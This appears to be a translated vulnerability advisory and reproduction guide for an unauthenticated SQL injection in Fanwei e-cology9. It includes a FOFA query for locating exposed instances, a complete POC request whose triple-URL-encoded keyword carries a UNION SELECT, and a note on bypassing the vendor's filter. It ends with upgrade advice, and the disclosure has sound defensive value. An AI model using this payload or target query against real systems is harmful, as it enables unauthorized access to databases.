1. Product introduction
Pan-micro collaborative management application platform e-cology is a set of enterprise information portal, knowledge document management, workflow management, human resource management, customer relationship management, project management, financial management, asset management, supply chain management, data center functions Enterprise large-scale collaborative management platform.
2. Vulnerability overview
There is a SQL injection vulnerability in Fanwei e-cology9. Unauthenticated remote attackers can use this vulnerability to obtain sensitive database information, and further exploitation may lead to the target system being charged.
3. Scope of influence
Affected version
Fanwei e-cology9 <= 10.55
unaffected version
Fanwei e-cology9 >= 10.56
4. Reproduce the environment
FOFA: app="Panwei-Collaborative Business System"
5. Vulnerability recurrence
Access the vulnerable environment, burp captures packets and sends the Repeater module for use
POC currently circulating on the Internet
POST /mobile/%20/plugin/browser.jsp HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
Content-Length: 651
isDis=1&browserTypeId=269&keyword=%2525%2536%2531%2525%2532%2537%2525%2532%2530%2525%2537%2535%2525%2536%2565%2525%2536%2539%2525%2536%2566%2525%2536%2565%2525%2532%2530%2525%2537%2533%2525%2536%2535%2525%2536%2563%2525%2536%2535%2525%2536%2533%2525%2537%2534%2525%2532%2530%2525%2533%2531%2525%2532%2563%2525%2532%2537%2525%2532%2537%2525%2532%2562%2525%2532%2538%2525%2535%2533%2525%2534%2535%2525%2534%2563%2525%2534%2535%2525%2534%2533%2525%2535%2534%2525%2532%2530%2525%2534%2530%2525%2534%2530%2525%2535%2536%2525%2534%2535%2525%2535%2532%2525%2535%2533%2525%2534%2539%2525%2534%2566%2525%2534%2565%2525%2532%2539%2525%2532%2562%2525%2532%2537
Note: Three parameters need to be passed in the POC
1. isDis must be 1
2. BrowserTypeId corresponding method
3. keyword is the injection point, and url encoding needs to be performed three times to escape Panwei's filtering mechanism (Panwei's blacklist mechanism will replace keywords with full-width characters)
Query database version information
Reproduced successfully
6. Repair suggestion
At present, the official security patch has been released, and it is recommended that affected users upgrade to version 10.56 and above as soon as possible.
https://www.weaver.com.cn/cs/securityDownload.asp